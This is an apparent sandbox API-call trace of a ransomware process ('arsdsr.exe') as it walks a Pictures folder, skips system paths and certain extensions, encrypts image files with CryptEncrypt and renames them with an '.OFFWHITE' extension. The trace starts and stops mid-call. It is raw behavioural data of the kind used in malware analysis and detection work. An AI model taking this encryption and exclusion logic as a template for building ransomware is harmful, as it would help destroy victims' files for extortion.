[0135.276] GetLastError () returned 0x0 [0135.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe281, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.276] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe381, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.276] WriteFile (in: hFile=0xb0, lpBuffer=0x5319a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5319a0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.276] GetProcessHeap () returned 0x500000 [0135.276] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe181) returned 0x55a7b8 [0135.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.276] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xe181, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xe181, lpOverlapped=0x0) returned 1 [0135.281] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.281] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xe181, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xe181, lpOverlapped=0x0) returned 1 [0135.281] GetProcessHeap () returned 0x500000 [0135.281] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.281] CloseHandle (hObject=0xb0) returned 1 [0135.283] GetProcessHeap () returned 0x500000 [0135.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.283] GetProcessHeap () returned 0x500000 [0135.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.283] GetProcessHeap () returned 0x500000 [0135.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.283] GetProcessHeap () returned 0x500000 [0135.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.283] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp" [0135.283] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp.OFFWHITE" [0135.283] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3cuutrep2n_ha_p fn9.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3cuUtRep2N_ha_P Fn9.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3cuutrep2n_ha_p fn9.bmp.offwhite")) returned 1 [0135.284] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78eeb50, ftCreationTime.dwHighDateTime=0x1d5e3aa, ftLastAccessTime.dwLowDateTime=0xd171ef80, ftLastAccessTime.dwHighDateTime=0x1d5dc7f, ftLastWriteTime.dwLowDateTime=0xd171ef80, ftLastWriteTime.dwHighDateTime=0x1d5dc7f, nFileSizeHigh=0x0, nFileSizeLow=0x830d, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="4u3Odj_V3s3t.gif", cAlternateFileName="4U3ODJ~1.GIF")) returned 1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2=".") returned 1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="..") returned 1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="...") returned 1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="windows") returned -1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="$recycle.bin") returned 1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="rsa") returned -1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="ntuser.dat") returned -1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="programdata") returned -1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="appdata") returned -1 [0135.284] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="program files") returned -1 [0135.285] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="program files (x86)") returned -1 [0135.285] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.285] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="4u3Odj_V3s3t.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif" [0135.285] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.285] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.285] PathFindExtensionW (pszPath="4u3Odj_V3s3t.gif") returned=".gif" [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.285] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.285] lstrcmpiW (lpString1="4u3Odj_V3s3t.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.285] GetProcessHeap () returned 0x500000 [0135.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319b0 [0135.285] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4u3odj_v3s3t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.286] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=33549) returned 1 [0135.286] GetProcessHeap () returned 0x500000 [0135.286] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.286] GetProcessHeap () returned 0x500000 [0135.286] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.286] GetProcessHeap () returned 0x500000 [0135.286] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.286] GetProcessHeap () returned 0x500000 [0135.286] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.286] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.286] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.286] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.286] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.287] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.287] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.287] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.287] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x830d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.287] SetLastError (dwErrCode=0x0) [0135.287] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.290] GetLastError () returned 0x0 [0135.290] GetLastError () returned 0x0 [0135.290] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x840d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.290] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.290] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x850d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.290] WriteFile (in: hFile=0xb0, lpBuffer=0x5319b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5319b0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.290] GetProcessHeap () returned 0x500000 [0135.290] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x830d) returned 0x55a7b8 [0135.290] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.290] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x830d, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x830d, lpOverlapped=0x0) returned 1 [0135.293] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.293] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x830d, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x830d, lpOverlapped=0x0) returned 1 [0135.293] GetProcessHeap () returned 0x500000 [0135.294] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.294] CloseHandle (hObject=0xb0) returned 1 [0135.296] GetProcessHeap () returned 0x500000 [0135.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.296] GetProcessHeap () returned 0x500000 [0135.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.296] GetProcessHeap () returned 0x500000 [0135.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.296] GetProcessHeap () returned 0x500000 [0135.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.296] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif" [0135.296] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif.OFFWHITE" [0135.297] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4u3odj_v3s3t.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4u3Odj_V3s3t.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4u3odj_v3s3t.gif.offwhite")) returned 1 [0135.297] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0135.297] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.297] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.297] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0135.297] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0135.297] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0135.298] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0135.298] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.298] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" [0135.298] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.298] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.298] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0135.298] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0135.298] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9508d0, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe5073750, ftLastAccessTime.dwHighDateTime=0x1d5dcbe, ftLastWriteTime.dwLowDateTime=0xe5073750, ftLastWriteTime.dwHighDateTime=0x1d5dcbe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="gNEccgvDLtY7H2sg3p04", cAlternateFileName="GNECCG~1")) returned 1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2=".") returned 1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="..") returned 1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="...") returned 1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="windows") returned -1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="$recycle.bin") returned 1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="rsa") returned -1 [0135.298] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="ntuser.dat") returned -1 [0135.299] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="programdata") returned -1 [0135.299] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="appdata") returned 1 [0135.299] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="program files") returned -1 [0135.299] lstrcmpiW (lpString1="gNEccgvDLtY7H2sg3p04", lpString2="program files (x86)") returned -1 [0135.299] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.299] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="gNEccgvDLtY7H2sg3p04" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04" [0135.299] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.299] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.299] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\*.*" [0135.299] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9508d0, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe5073750, ftLastAccessTime.dwHighDateTime=0x1d5dcbe, ftLastWriteTime.dwLowDateTime=0xe5073750, ftLastWriteTime.dwHighDateTime=0x1d5dcbe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName=".", cAlternateFileName="")) returned 0x544650 [0135.301] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.301] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9508d0, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe5073750, ftLastAccessTime.dwHighDateTime=0x1d5dcbe, ftLastWriteTime.dwLowDateTime=0xe5073750, ftLastWriteTime.dwHighDateTime=0x1d5dcbe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="..", cAlternateFileName="")) returned 1 [0135.301] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.301] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.301] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285b5b40, ftCreationTime.dwHighDateTime=0x1d5dd22, ftLastAccessTime.dwLowDateTime=0x137c04a0, ftLastAccessTime.dwHighDateTime=0x1d5e230, ftLastWriteTime.dwLowDateTime=0x137c04a0, ftLastWriteTime.dwHighDateTime=0x1d5e230, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="1POmGc9c", cAlternateFileName="")) returned 1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2=".") returned 1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="..") returned 1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="...") returned 1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="windows") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="$recycle.bin") returned 1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="rsa") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="ntuser.dat") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="programdata") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="appdata") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="program files") returned -1 [0135.301] lstrcmpiW (lpString1="1POmGc9c", lpString2="program files (x86)") returned -1 [0135.301] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.302] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="1POmGc9c" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c" [0135.302] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.302] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.302] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\*.*" [0135.302] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285b5b40, ftCreationTime.dwHighDateTime=0x1d5dd22, ftLastAccessTime.dwLowDateTime=0x137c04a0, ftLastAccessTime.dwHighDateTime=0x1d5e230, ftLastWriteTime.dwLowDateTime=0x137c04a0, ftLastWriteTime.dwHighDateTime=0x1d5e230, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0135.304] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.304] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285b5b40, ftCreationTime.dwHighDateTime=0x1d5dd22, ftLastAccessTime.dwLowDateTime=0x137c04a0, ftLastAccessTime.dwHighDateTime=0x1d5e230, ftLastWriteTime.dwLowDateTime=0x137c04a0, ftLastWriteTime.dwHighDateTime=0x1d5e230, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0135.304] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.304] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.304] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 